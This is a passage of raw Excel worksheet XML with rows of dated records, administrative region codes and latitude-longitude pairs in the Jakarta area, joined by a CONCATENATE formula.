    <row r="64" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A64">
        <v>98654</v>
      </c>
      <c r="B64" s="1">
        <v>43831</v>
      </c>
      <c r="C64" s="2">
        <v>0.48085648148148147</v>
      </c>
      <c r="D64" t="s">
        <v>22</v>
      </c>
      <c r="E64" t="s">
        <v>23</v>
      </c>
      <c r="F64" t="s">
        <v>378</v>
      </c>
      <c r="G64" t="s">
        <v>379</v>
      </c>
      <c r="H64" t="s">
        <v>26</v>
      </c>
      <c r="I64" t="s">
        <v>380</v>
      </c>
      <c r="J64" t="s">
        <v>374</v>
      </c>
      <c r="M64">
        <v>3174040005</v>
      </c>
      <c r="N64">
        <v>3174040</v>
      </c>
      <c r="O64">
        <v>3174</v>
      </c>
      <c r="P64">
        <v>31</v>
      </c>
      <c r="Q64" t="s">
        <v>376</v>
      </c>
      <c r="R64" t="s">
        <v>377</v>
      </c>
      <c r="S64" t="s">
        <v>32</v>
      </c>
      <c r="T64" t="s">
        <v>33</v>
      </c>
      <c r="U64" s="5">
        <v>10678905</v>
      </c>
      <c r="V64" s="5" t="s">
        <v>14512</v>
      </c>
      <c r="W64" s="5">
        <v>-616397</v>
      </c>
      <c r="X64" t="s">
        <v>18325</v>
      </c>
      <c r="Y64" t="str">
        <f t="shared" si="0"/>
        <v>-6.16397,106.78905</v>
      </c>
    </row>
    <row r="65" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A65">
        <v>98655</v>
      </c>
      <c r="B65" s="1">
        <v>43831</v>
      </c>
      <c r="C65" s="2">
        <v>0.49487268518518518</v>
      </c>
      <c r="D65" t="s">
        <v>22</v>
      </c>
      <c r="E65" t="s">
        <v>23</v>
      </c>
      <c r="F65" t="s">
        <v>381</v>
      </c>
      <c r="G65" t="s">
        <v>382</v>
      </c>
      <c r="H65" t="s">
        <v>26</v>
      </c>
      <c r="I65" t="s">
        <v>383</v>
      </c>
      <c r="J65" t="s">
        <v>28</v>
      </c>
      <c r="L65" t="s">
        <v>384</v>
      </c>
      <c r="M65">
        <v>3174020005</v>
      </c>
      <c r="N65">
        <v>3174020</v>
      </c>
      <c r="O65">
        <v>3174</v>
      </c>
      <c r="P65">
        <v>31</v>
      </c>
      <c r="Q65" t="s">
        <v>30</v>
      </c>
      <c r="R65" t="s">
        <v>31</v>
      </c>
      <c r="S65" t="s">
        <v>32</v>
      </c>
      <c r="T65" t="s">
        <v>33</v>
      </c>
      <c r="U65" s="5">
        <v>10676774</v>
      </c>
      <c r="V65" s="5" t="s">
        <v>14513</v>
      </c>
      <c r="W65" s="5">
        <v>-617746</v>
      </c>
      <c r="X65" t="s">
        <v>18326</v>
      </c>
      <c r="Y65" t="str">
        <f t="shared" si="0"/>
        <v>-6.17746,106.76774</v>
      </c>
    </row>
    <row r="66" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A66">
        <v>98656</v>
      </c>
      <c r="B66" s="1">
        <v>43831</v>
      </c>
      <c r="C66" s="2">
        <v>0.49756944444444445</v>
      </c>
      <c r="D66" t="s">
        <v>22</v>
      </c>
      <c r="E66" t="s">
        <v>23</v>
      </c>
      <c r="F66" t="s">
        <v>385</v>
      </c>
      <c r="H66" t="s">
        <v>26</v>
      </c>
      <c r="I66" t="s">
        <v>386</v>
      </c>
      <c r="J66" t="s">
        <v>387</v>
      </c>
      <c r="L66" t="s">
        <v>388</v>
      </c>
      <c r="M66">
        <v>3174040007</v>
      </c>
      <c r="N66">
        <v>3174040</v>
      </c>
      <c r="O66">
        <v>3174</v>
      </c>
      <c r="P66">
        <v>31</v>
      </c>
      <c r="Q66" t="s">
        <v>389</v>
      </c>
      <c r="R66" t="s">
        <v>377</v>
      </c>
      <c r="S66" t="s">
        <v>32</v>
      </c>
      <c r="T66" t="s">
        <v>33</v>
      </c>
      <c r="U66" s="5">
        <v>10678175</v>
      </c>
      <c r="V66" s="5" t="s">
        <v>14514</v>
      </c>
      <c r="W66" s="5">
        <v>-614984</v>
      </c>
      <c r="X66" t="s">
        <v>18327</v>
      </c>
      <c r="Y66" t="str">
        <f t="shared" si="0"/>
        <v>-6.14984,106.78175</v>
      </c>
    </row>
    <row r="67" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A67">
        <v>98657</v>
      </c>
      <c r="B67" s="1">
        <v>43831</v>
      </c>
      <c r="C67" s="2">
        <v>0.50335648148148149</v>
      </c>
      <c r="D67" t="s">
        <v>85</v>
      </c>
      <c r="E67" t="s">
        <v>23</v>
      </c>
      <c r="F67" t="s">
        <v>390</v>
      </c>
      <c r="G67" t="s">
        <v>391</v>
      </c>
      <c r="H67" t="s">
        <v>26</v>
      </c>
      <c r="J67" t="s">
        <v>37</v>
      </c>
      <c r="K67" t="s">
        <v>392</v>
      </c>
      <c r="L67" t="s">
        <v>393</v>
      </c>
      <c r="M67">
        <v>3674040002</v>
      </c>
      <c r="N67">
        <v>3674040</v>
      </c>
      <c r="O67">
        <v>3674</v>
      </c>
      <c r="P67">
        <v>36</v>
      </c>
      <c r="Q67" t="s">
        <v>340</v>
      </c>
      <c r="R67" t="s">
        <v>229</v>
      </c>
      <c r="S67" t="s">
        <v>170</v>
      </c>
      <c r="T67" t="s">
        <v>171</v>
      </c>
      <c r="U67" s="5">
        <v>10671621</v>
      </c>
      <c r="V67" s="5" t="s">
        <v>14505</v>
      </c>
      <c r="W67" s="5">
        <v>-629700</v>
      </c>
      <c r="X67" t="s">
        <v>18318</v>
      </c>
      <c r="Y67" t="str">
        <f t="shared" ref="Y67:Y130" si="1">CONCATENATE(X67,",",V67)</f>
        <v>-6.29700,106.71621</v>
      </c>
    </row>
    <row r="68" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A68">
        <v>98664</v>
      </c>
      <c r="B68" s="1">
        <v>43831</v>
      </c>
      <c r="C68" s="2">
        <v>0.50703703703703706</v>
      </c>
      <c r="D68" t="s">
        <v>22</v>
      </c>
      <c r="E68" t="s">
        <v>23</v>
      </c>
      <c r="F68" t="s">
        <v>394</v>
      </c>
      <c r="G68" t="s">
        <v>395</v>
      </c>
      <c r="H68" t="s">
        <v>26</v>
      </c>
      <c r="I68" t="s">
        <v>193</v>
      </c>
      <c r="J68" t="s">
        <v>37</v>
      </c>
      <c r="L68" t="s">
        <v>396</v>
      </c>
      <c r="M68">
        <v>3275041004</v>
      </c>
      <c r="N68">
        <v>3275041</v>
      </c>
      <c r="O68">
        <v>3275</v>
      </c>
      <c r="P68">
        <v>32</v>
      </c>
      <c r="Q68" t="s">
        <v>133</v>
      </c>
      <c r="R68" t="s">
        <v>134</v>
      </c>
      <c r="S68" t="s">
        <v>41</v>
      </c>
      <c r="T68" t="s">
        <v>42</v>
      </c>
      <c r="U68" s="5">
        <v>10700508</v>
      </c>
      <c r="V68" s="5" t="s">
        <v>14515</v>
      </c>
      <c r="W68" s="5">
        <v>-626556</v>
      </c>
      <c r="X68" t="s">
        <v>18328</v>
      </c>
      <c r="Y68" t="str">
        <f t="shared" si="1"/>
        <v>-6.26556,107.00508</v>
      </c>
    </row>
    <row r="69" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A69">
        <v>98697</v>
      </c>
      <c r="B69" s="1">
        <v>43831</v>
      </c>
      <c r="C69" s="2">
        <v>0.52034722222222218</v>
      </c>
      <c r="D69" t="s">
        <v>22</v>
      </c>
      <c r="E69" t="s">
        <v>23</v>
      </c>
      <c r="F69" t="s">
        <v>397</v>
      </c>
      <c r="G69" t="s">
        <v>398</v>
      </c>
      <c r="H69" t="s">
        <v>26</v>
      </c>
      <c r="I69" t="s">
        <v>386</v>
      </c>
      <c r="J69" t="s">
        <v>37</v>
      </c>
      <c r="L69" t="s">
        <v>399</v>
      </c>
      <c r="M69">
        <v>3671010003</v>
      </c>
      <c r="N69">
        <v>3671010</v>
      </c>
      <c r="O69">
        <v>3671</v>
      </c>
      <c r="P69">
        <v>36</v>
      </c>
      <c r="Q69" t="s">
        <v>400</v>
      </c>
      <c r="R69" t="s">
        <v>200</v>
      </c>
      <c r="S69" t="s">
        <v>201</v>
      </c>
      <c r="T69" t="s">
        <v>171</v>
      </c>
      <c r="U69" s="5">
        <v>10670988</v>
      </c>
      <c r="V69" s="5" t="s">
        <v>14516</v>
      </c>
      <c r="W69" s="5">
        <v>-624914</v>
      </c>
      <c r="X69" t="s">
        <v>18329</v>
      </c>
      <c r="Y69" t="str">
        <f t="shared" si="1"/>
        <v>-6.24914,106.70988</v>
      </c>
    </row>
    <row r="70" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A70">
        <v>98730</v>
      </c>
      <c r="B70" s="1">
        <v>43831</v>
      </c>
      <c r="C70" s="2">
        <v>0.53040509259259261</v>
      </c>
      <c r="D70" t="s">
        <v>22</v>
      </c>
      <c r="E70" t="s">
        <v>23</v>
      </c>
      <c r="F70" t="s">
        <v>401</v>
      </c>
      <c r="G70" t="s">
        <v>402</v>
      </c>
      <c r="H70" t="s">
        <v>26</v>
      </c>
      <c r="I70" t="s">
        <v>403</v>
      </c>
      <c r="J70" t="s">
        <v>404</v>
      </c>
      <c r="L70" t="s">
        <v>405</v>
      </c>
      <c r="M70">
        <v>3174020005</v>
      </c>
      <c r="N70">
        <v>3174020</v>
      </c>
      <c r="O70">
        <v>3174</v>
      </c>
      <c r="P70">
        <v>31</v>
      </c>
      <c r="Q70" t="s">
        <v>30</v>
      </c>
      <c r="R70" t="s">
        <v>31</v>
      </c>
      <c r="S70" t="s">
        <v>32</v>
      </c>
      <c r="T70" t="s">
        <v>33</v>
      </c>
      <c r="U70" s="5">
        <v>10677093</v>
      </c>
      <c r="V70" s="5" t="s">
        <v>14517</v>
      </c>
      <c r="W70" s="5">
        <v>-616438</v>
      </c>
      <c r="X70" t="s">
        <v>18330</v>
      </c>
      <c r="Y70" t="str">
        <f t="shared" si="1"/>
        <v>-6.16438,106.77093</v>
      </c>
    </row>
    <row r="71" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A71">
        <v>98735</v>
      </c>
      <c r="B71" s="1">
        <v>43831</v>
      </c>
      <c r="C71" s="2">
        <v>0.53195601851851848</v>
      </c>
      <c r="D71" t="s">
        <v>22</v>
      </c>
      <c r="E71" t="s">
        <v>23</v>
      </c>
      <c r="F71" t="s">
        <v>406</v>
      </c>
      <c r="G71" t="s">
        <v>407</v>
      </c>
      <c r="H71" t="s">
        <v>26</v>
      </c>
      <c r="I71" t="s">
        <v>408</v>
      </c>
      <c r="J71" t="s">
        <v>409</v>
      </c>
      <c r="L71" t="s">
        <v>410</v>
      </c>
      <c r="M71">
        <v>3171040003</v>
      </c>
      <c r="N71">
        <v>3171040</v>
      </c>
      <c r="O71">
        <v>3171</v>
      </c>
      <c r="P71">
        <v>31</v>
      </c>
      <c r="Q71" t="s">
        <v>411</v>
      </c>
      <c r="R71" t="s">
        <v>163</v>
      </c>
      <c r="S71" t="s">
        <v>108</v>
      </c>
      <c r="T71" t="s">
        <v>33</v>
      </c>
      <c r="U71" s="5">
        <v>10676796</v>
      </c>
      <c r="V71" s="5" t="s">
        <v>14518</v>
      </c>
      <c r="W71" s="5">
        <v>-624458</v>
      </c>
      <c r="X71" t="s">
        <v>18331</v>
      </c>
      <c r="Y71" t="str">
        <f t="shared" si="1"/>
        <v>-6.24458,106.76796</v>
      </c>
    </row>
    <row r="72" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A72">
        <v>98752</v>
      </c>
      <c r="B72" s="1">
        <v>43831</v>
      </c>
      <c r="C72" s="2">
        <v>0.53466435185185179</v>
      </c>
      <c r="D72" t="s">
        <v>85</v>
      </c>
      <c r="E72" t="s">
        <v>23</v>
      </c>
      <c r="F72" t="s">
        <v>412</v>
      </c>
      <c r="G72" t="s">
        <v>413</v>
      </c>
      <c r="H72" t="s">
        <v>26</v>
      </c>
      <c r="J72" t="s">
        <v>326</v>
      </c>
      <c r="K72" t="s">
        <v>414</v>
      </c>
      <c r="L72" t="s">
        <v>415</v>
      </c>
      <c r="M72">
        <v>3173060008</v>
      </c>
      <c r="N72">
        <v>3173060</v>
      </c>
      <c r="O72">
        <v>3173</v>
      </c>
      <c r="P72">
        <v>31</v>
      </c>
      <c r="Q72" t="s">
        <v>329</v>
      </c>
      <c r="R72" t="s">
        <v>61</v>
      </c>
      <c r="S72" t="s">
        <v>62</v>
      </c>
      <c r="T72" t="s">
        <v>33</v>
      </c>
      <c r="U72" s="5">
        <v>10683857</v>
      </c>
      <c r="V72" s="5" t="s">
        <v>14519</v>
      </c>
      <c r="W72" s="5">
        <v>-616350</v>
      </c>
      <c r="X72" t="s">
        <v>18332</v>
      </c>
      <c r="Y72" t="str">
        <f t="shared" si="1"/>
        <v>-6.16350,106.83857</v>
      </c>
    </row>
    <row r="73" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A73">
        <v>98797</v>
      </c>
      <c r="B73" s="1">
        <v>43831</v>
      </c>
      <c r="C73" s="2">
        <v>0.54767361111111112</v>
      </c>
      <c r="D73" t="s">
        <v>22</v>
      </c>
      <c r="E73" t="s">
        <v>23</v>
      </c>
      <c r="F73" t="s">
        <v>416</v>
      </c>
      <c r="H73" t="s">
        <v>26</v>
      </c>
      <c r="I73" t="s">
        <v>417</v>
      </c>
      <c r="J73" t="s">
        <v>37</v>
      </c>
      <c r="L73" t="s">
        <v>418</v>
      </c>
      <c r="M73">
        <v>3201190010</v>
      </c>
      <c r="N73">
        <v>3201190</v>
      </c>
      <c r="O73">
        <v>3201</v>
      </c>
      <c r="P73">
        <v>32</v>
      </c>
      <c r="Q73" t="s">
        <v>419</v>
      </c>
      <c r="R73" t="s">
        <v>420</v>
      </c>
      <c r="S73" t="s">
        <v>421</v>
      </c>
      <c r="T73" t="s">
        <v>42</v>
      </c>
      <c r="U73" s="5">
        <v>10697480</v>
      </c>
      <c r="V73" s="5" t="s">
        <v>14520</v>
      </c>
      <c r="W73" s="5">
        <v>-632633</v>
      </c>
      <c r="X73" t="s">
        <v>18333</v>
      </c>
      <c r="Y73" t="str">
        <f t="shared" si="1"/>
        <v>-6.32633,106.97480</v>
      </c>
    </row>
    <row r="74" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A74">
        <v>98851</v>
      </c>
      <c r="B74" s="1">
        <v>43831</v>
      </c>
      <c r="C74" s="2">
        <v>0.56469907407407405</v>
      </c>
      <c r="D74" t="s">
        <v>22</v>
      </c>
      <c r="E74" t="s">
        <v>23</v>
      </c>
      <c r="F74" t="s">
        <v>422</v>
      </c>
      <c r="G74" t="s">
        <v>423</v>
      </c>
      <c r="H74" t="s">
        <v>26</v>
      </c>
      <c r="I74" t="s">
        <v>424</v>
      </c>
      <c r="J74" t="s">
        <v>425</v>
      </c>
      <c r="L74" t="s">
        <v>426</v>
      </c>
      <c r="M74">
        <v>3174020006</v>
      </c>
      <c r="N74">
        <v>3174020</v>
      </c>
      <c r="O74">
        <v>3174</v>
      </c>
      <c r="P74">
        <v>31</v>
      </c>
      <c r="Q74" t="s">
        <v>427</v>
      </c>
      <c r="R74" t="s">
        <v>31</v>
      </c>
      <c r="S74" t="s">
        <v>32</v>
      </c>
      <c r="T74" t="s">
        <v>33</v>
      </c>
      <c r="U74" s="5">
        <v>10675442</v>
      </c>
      <c r="V74" s="5" t="s">
        <v>14521</v>
      </c>
      <c r="W74" s="5">
        <v>-617703</v>
      </c>
      <c r="X74" t="s">
        <v>18334</v>
      </c>
      <c r="Y74" t="str">
        <f t="shared" si="1"/>
        <v>-6.17703,106.75442</v>
      </c>
    </row>
    <row r="75" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A75">
        <v>98852</v>
      </c>
      <c r="B75" s="1">
        <v>43831</v>
      </c>
      <c r="C75" s="2">
        <v>0.56468750000000001</v>
      </c>
      <c r="D75" t="s">
        <v>22</v>
      </c>
      <c r="E75" t="s">
        <v>23</v>
      </c>
      <c r="F75" t="s">
        <v>428</v>
      </c>
      <c r="G75" t="s">
        <v>429</v>
      </c>
      <c r="H75" t="s">
        <v>26</v>
      </c>
      <c r="I75" t="s">
        <v>430</v>
      </c>
      <c r="J75" t="s">
        <v>37</v>
      </c>
      <c r="L75" t="s">
        <v>431</v>
      </c>
      <c r="M75">
        <v>3275041003</v>
      </c>
      <c r="N75">
        <v>3275041</v>
      </c>
      <c r="O75">
        <v>3275</v>
      </c>
      <c r="P75">
        <v>32</v>
      </c>
      <c r="Q75" t="s">
        <v>432</v>
      </c>
      <c r="R75" t="s">
        <v>134</v>
      </c>
      <c r="S75" t="s">
        <v>41</v>
      </c>
      <c r="T75" t="s">
        <v>42</v>
      </c>
      <c r="U75" s="5">
        <v>10699019</v>
      </c>
      <c r="V75" s="5" t="s">
        <v>14522</v>
      </c>
      <c r="W75" s="5">
        <v>-626261</v>
      </c>
      <c r="X75" t="s">
        <v>18335</v>
      </c>
      <c r="Y75" t="str">
        <f t="shared" si="1"/>
        <v>-6.26261,106.99019</v>
      </c>
    </row>
    <row r="76" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A76">
        <v>98909</v>
      </c>
      <c r="B76" s="1">
        <v>43831</v>
      </c>
      <c r="C76" s="2">
        <v>0.59964120370370366</v>
      </c>
      <c r="D76" t="s">
        <v>22</v>
      </c>
      <c r="E76" t="s">
        <v>23</v>
      </c>
      <c r="F76" t="s">
        <v>433</v>
      </c>
      <c r="G76" t="s">
        <v>434</v>
      </c>
      <c r="H76" t="s">
        <v>26</v>
      </c>
      <c r="I76" t="s">
        <v>435</v>
      </c>
      <c r="J76" t="s">
        <v>37</v>
      </c>
      <c r="L76" t="s">
        <v>436</v>
      </c>
      <c r="M76">
        <v>3674060008</v>
      </c>
      <c r="N76">
        <v>3674060</v>
      </c>
      <c r="O76">
        <v>3674</v>
      </c>
      <c r="P76">
        <v>36</v>
      </c>
      <c r="Q76" t="s">
        <v>168</v>
      </c>
      <c r="R76" t="s">
        <v>169</v>
      </c>
      <c r="S76" t="s">
        <v>170</v>
      </c>
      <c r="T76" t="s">
        <v>171</v>
      </c>
      <c r="U76" s="5">
        <v>10671737</v>
      </c>
      <c r="V76" s="5" t="s">
        <v>14523</v>
      </c>
      <c r="W76" s="5">
        <v>-625797</v>
      </c>
      <c r="X76" t="s">
        <v>18336</v>
      </c>
      <c r="Y76" t="str">
        <f t="shared" si="1"/>
        <v>-6.25797,106.71737</v>
      </c>
    </row>
    <row r="77" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A77">
        <v>98910</v>
      </c>
      <c r="B77" s="1">
        <v>43831</v>
      </c>
      <c r="C77" s="2">
        <v>0.61040509259259257</v>
      </c>
      <c r="D77" t="s">
        <v>22</v>
      </c>
      <c r="E77" t="s">
        <v>23</v>
      </c>
      <c r="F77" t="s">
        <v>437</v>
      </c>
      <c r="G77" t="s">
        <v>438</v>
      </c>
      <c r="H77" t="s">
        <v>26</v>
      </c>
      <c r="I77" t="s">
        <v>380</v>
      </c>
      <c r="J77" t="s">
        <v>439</v>
      </c>
      <c r="L77" t="s">
        <v>440</v>
      </c>
      <c r="M77">
        <v>3174020006</v>
      </c>
      <c r="N77">
        <v>3174020</v>
      </c>
      <c r="O77">
        <v>3174</v>
      </c>
      <c r="P77">
        <v>31</v>
      </c>
      <c r="Q77" t="s">
        <v>427</v>
      </c>
      <c r="R77" t="s">
        <v>31</v>
      </c>
      <c r="S77" t="s">
        <v>32</v>
      </c>
      <c r="T77" t="s">
        <v>33</v>
      </c>
      <c r="U77" s="5">
        <v>10674994</v>
      </c>
      <c r="V77" s="5" t="s">
        <v>14524</v>
      </c>
      <c r="W77" s="5">
        <v>-617977</v>
      </c>
      <c r="X77" t="s">
        <v>18337</v>
      </c>
      <c r="Y77" t="str">
        <f t="shared" si="1"/>
        <v>-6.17977,106.74994</v>
      </c>
    </row>
    <row r="78" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A78">
        <v>98911</v>
      </c>
      <c r="B78" s="1">
        <v>43831</v>
      </c>
      <c r="C78" s="2">
        <v>0.62265046296296289</v>
      </c>
      <c r="D78" t="s">
        <v>22</v>
      </c>
      <c r="E78" t="s">
        <v>23</v>
      </c>
      <c r="F78" t="s">
        <v>441</v>
      </c>
      <c r="G78" t="s">
        <v>442</v>
      </c>
      <c r="H78" t="s">
        <v>26</v>
      </c>
      <c r="I78" t="s">
        <v>443</v>
      </c>
      <c r="J78" t="s">
        <v>444</v>
      </c>
      <c r="L78" t="s">
        <v>445</v>
      </c>
      <c r="M78">
        <v>3174020005</v>
      </c>
      <c r="N78">
        <v>3174020</v>
      </c>
      <c r="O78">
        <v>3174</v>
      </c>
      <c r="P78">
        <v>31</v>
      </c>
      <c r="Q78" t="s">
        <v>30</v>
      </c>
      <c r="R78" t="s">
        <v>31</v>
      </c>
      <c r="S78" t="s">
        <v>32</v>
      </c>
      <c r="T78" t="s">
        <v>33</v>
      </c>
      <c r="U78" s="5">
        <v>10677877</v>
      </c>
      <c r="V78" s="5" t="s">
        <v>14525</v>
      </c>
      <c r="W78" s="5">
        <v>-617535</v>
      </c>
      <c r="X78" t="s">
        <v>18338</v>
      </c>
      <c r="Y78" t="str">
        <f t="shared" si="1"/>
        <v>-6.17535,106.77877</v>
      </c>
    </row>
    <row r="79" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A79">
        <v>98912</v>
      </c>
      <c r="B79" s="1">
        <v>43831</v>
      </c>
      <c r="C79" s="2">
        <v>0.63480324074074079</v>
      </c>
      <c r="D79" t="s">
        <v>22</v>
      </c>
      <c r="E79" t="s">
        <v>23</v>
      </c>
      <c r="F79" t="s">
        <v>446</v>
      </c>
      <c r="G79" t="s">
        <v>447</v>
      </c>
      <c r="H79" t="s">
        <v>26</v>
      </c>
      <c r="I79" t="s">
        <v>290</v>
      </c>
      <c r="J79" t="s">
        <v>448</v>
      </c>
      <c r="L79" t="s">
        <v>449</v>
      </c>
      <c r="M79">
        <v>3173070001</v>
      </c>
      <c r="N79">
        <v>3173070</v>
      </c>
      <c r="O79">
        <v>3173</v>
      </c>
      <c r="P79">
        <v>31</v>
      </c>
      <c r="Q79" t="s">
        <v>322</v>
      </c>
      <c r="R79" t="s">
        <v>323</v>
      </c>
      <c r="S79" t="s">
        <v>62</v>
      </c>
      <c r="T79" t="s">
        <v>33</v>
      </c>
      <c r="U79" s="5">
        <v>10683563</v>
      </c>
      <c r="V79" s="5" t="s">
        <v>14526</v>
      </c>
      <c r="W79" s="5">
        <v>-616376</v>
      </c>
      <c r="X79" t="s">
        <v>18339</v>
      </c>
      <c r="Y79" t="str">
        <f t="shared" si="1"/>
        <v>-6.16376,106.83563</v>
      </c>
    </row>
    <row r="80" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A80">
        <v>98913</v>
      </c>
      <c r="B80" s="1">
        <v>43831</v>
      </c>
      <c r="C80" s="2">
        <v>0.63619212962962968</v>
      </c>
      <c r="D80" t="s">
        <v>22</v>
      </c>
      <c r="E80" t="s">
        <v>23</v>
      </c>
      <c r="F80" t="s">
        <v>450</v>
      </c>
      <c r="G80" t="s">
        <v>451</v>
      </c>
      <c r="H80" t="s">
        <v>26</v>
      </c>
      <c r="I80" t="s">
        <v>452</v>
      </c>
      <c r="J80" t="s">
        <v>37</v>
      </c>
      <c r="L80" t="s">
        <v>453</v>
      </c>
      <c r="M80">
        <v>3671021007</v>
      </c>
      <c r="N80">
        <v>3671021</v>
      </c>
      <c r="O80">
        <v>3671</v>
      </c>
      <c r="P80">
        <v>36</v>
      </c>
      <c r="Q80" t="s">
        <v>454</v>
      </c>
      <c r="R80" t="s">
        <v>454</v>
      </c>
      <c r="S80" t="s">
        <v>201</v>
      </c>
      <c r="T80" t="s">
        <v>171</v>
      </c>
      <c r="U80" s="5">
        <v>10669271</v>
      </c>
      <c r="V80" s="5" t="s">
        <v>14527</v>
      </c>
      <c r="W80" s="5">
        <v>-621783</v>
      </c>
      <c r="X80" t="s">
        <v>18340</v>
      </c>
      <c r="Y80" t="str">
        <f t="shared" si="1"/>
        <v>-6.21783,106.69271</v>
      </c>
    </row>
    <row r="81" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A81">
        <v>98914</v>
      </c>
      <c r="B81" s="1">
        <v>43831</v>
      </c>
      <c r="C81" s="2">
        <v>0.64665509259259257</v>
      </c>
      <c r="D81" t="s">
        <v>22</v>
      </c>
      <c r="E81" t="s">
        <v>23</v>
      </c>
      <c r="F81" t="s">
        <v>455</v>
      </c>
      <c r="G81" t="s">
        <v>456</v>
      </c>
      <c r="H81" t="s">
        <v>26</v>
      </c>
      <c r="I81" t="s">
        <v>457</v>
      </c>
      <c r="J81" t="s">
        <v>37</v>
      </c>
      <c r="L81" t="s">
        <v>458</v>
      </c>
      <c r="M81">
        <v>3275061004</v>
      </c>
      <c r="N81">
        <v>3275061</v>
      </c>
      <c r="O81">
        <v>3275</v>
      </c>
      <c r="P81">
        <v>32</v>
      </c>
      <c r="Q81" t="s">
        <v>39</v>
      </c>
      <c r="R81" t="s">
        <v>40</v>
      </c>
      <c r="S81" t="s">
        <v>41</v>
      </c>
      <c r="T81" t="s">
        <v>42</v>
      </c>
      <c r="U81" s="5">
        <v>10698853</v>
      </c>
      <c r="V81" s="5" t="s">
        <v>14528</v>
      </c>
      <c r="W81" s="5">
        <v>-617960</v>
      </c>
      <c r="X81" t="s">
        <v>18341</v>
      </c>
      <c r="Y81" t="str">
        <f t="shared" si="1"/>
        <v>-6.17960,106.98853</v>
      </c>
    </row>
    <row r="82" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A82">
        <v>98915</v>
      </c>
      <c r="B82" s="1">
        <v>43831</v>
      </c>
      <c r="C82" s="2">
        <v>0.67596064814814805</v>
      </c>
      <c r="D82" t="s">
        <v>22</v>
      </c>
      <c r="E82" t="s">
        <v>23</v>
      </c>
      <c r="F82" t="s">
        <v>459</v>
      </c>
      <c r="G82" t="s">
        <v>460</v>
      </c>
      <c r="H82" t="s">
        <v>26</v>
      </c>
      <c r="I82" t="s">
        <v>166</v>
      </c>
      <c r="J82" t="s">
        <v>37</v>
      </c>
      <c r="L82" t="s">
        <v>461</v>
      </c>
      <c r="M82">
        <v>3674030007</v>
      </c>
      <c r="N82">
        <v>3674030</v>
      </c>
      <c r="O82">
        <v>3674</v>
      </c>
      <c r="P82">
        <v>36</v>
      </c>
      <c r="Q82" t="s">
        <v>462</v>
      </c>
      <c r="R82" t="s">
        <v>245</v>
      </c>
      <c r="S82" t="s">
        <v>170</v>
      </c>
      <c r="T82" t="s">
        <v>171</v>
      </c>
      <c r="U82" s="5">
        <v>10674044</v>
      </c>
      <c r="V82" s="5" t="s">
        <v>14529</v>
      </c>
      <c r="W82" s="5">
        <v>-632787</v>
      </c>
      <c r="X82" t="s">
        <v>18342</v>
      </c>
      <c r="Y82" t="str">
        <f t="shared" si="1"/>
        <v>-6.32787,106.74044</v>
      </c>
    </row>
    <row r="83" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A83">
        <v>98916</v>
      </c>
      <c r="B83" s="1">
        <v>43831</v>
      </c>
      <c r="C83" s="2">
        <v>0.67149305555555561</v>
      </c>
      <c r="D83" t="s">
        <v>85</v>
      </c>
      <c r="E83" t="s">
        <v>23</v>
      </c>
      <c r="F83" t="s">
        <v>463</v>
      </c>
      <c r="G83" t="s">
        <v>464</v>
      </c>
      <c r="H83" t="s">
        <v>26</v>
      </c>
      <c r="J83" t="s">
        <v>260</v>
      </c>
      <c r="K83" t="s">
        <v>465</v>
      </c>
      <c r="L83" t="s">
        <v>466</v>
      </c>
      <c r="M83">
        <v>3171010003</v>
      </c>
      <c r="N83">
        <v>3171010</v>
      </c>
      <c r="O83">
        <v>3171</v>
      </c>
      <c r="P83">
        <v>31</v>
      </c>
      <c r="Q83" t="s">
        <v>263</v>
      </c>
      <c r="R83" t="s">
        <v>264</v>
      </c>
      <c r="S83" t="s">
        <v>108</v>
      </c>
      <c r="T83" t="s">
        <v>33</v>
      </c>
      <c r="U83" s="5">
        <v>10680215</v>
      </c>
      <c r="V83" s="5" t="s">
        <v>14530</v>
      </c>
      <c r="W83" s="5">
        <v>-634066</v>
      </c>
      <c r="X83" t="s">
        <v>18343</v>
      </c>
      <c r="Y83" t="str">
        <f t="shared" si="1"/>
        <v>-6.34066,106.80215</v>
      </c>
    </row>
    <row r="84" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A84">
        <v>98958</v>
      </c>
      <c r="B84" s="1">
        <v>43831</v>
      </c>
      <c r="C84" s="2">
        <v>0.61502314814814818</v>
      </c>
      <c r="D84" t="s">
        <v>85</v>
      </c>
      <c r="E84" t="s">
        <v>23</v>
      </c>
      <c r="F84" t="s">
        <v>467</v>
      </c>
      <c r="G84" t="s">
        <v>468</v>
      </c>
      <c r="H84" t="s">
        <v>26</v>
      </c>
      <c r="J84" t="s">
        <v>306</v>
      </c>
      <c r="K84" t="s">
        <v>469</v>
      </c>
      <c r="L84" t="s">
        <v>470</v>
      </c>
      <c r="M84">
        <v>3172060001</v>
      </c>
      <c r="N84">
        <v>3172060</v>
      </c>
      <c r="O84">
        <v>3172</v>
      </c>
      <c r="P84">
        <v>31</v>
      </c>
      <c r="Q84" t="s">
        <v>309</v>
      </c>
      <c r="R84" t="s">
        <v>48</v>
      </c>
      <c r="S84" t="s">
        <v>49</v>
      </c>
      <c r="T84" t="s">
        <v>33</v>
      </c>
      <c r="U84" s="5">
        <v>10686718</v>
      </c>
      <c r="V84" s="5" t="s">
        <v>14531</v>
      </c>
      <c r="W84" s="5">
        <v>-623830</v>
      </c>
      <c r="X84" t="s">
        <v>18344</v>
      </c>
      <c r="Y84" t="str">
        <f t="shared" si="1"/>
        <v>-6.23830,106.86718</v>
      </c>
    </row>
    <row r="85" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A85">
        <v>98962</v>
      </c>
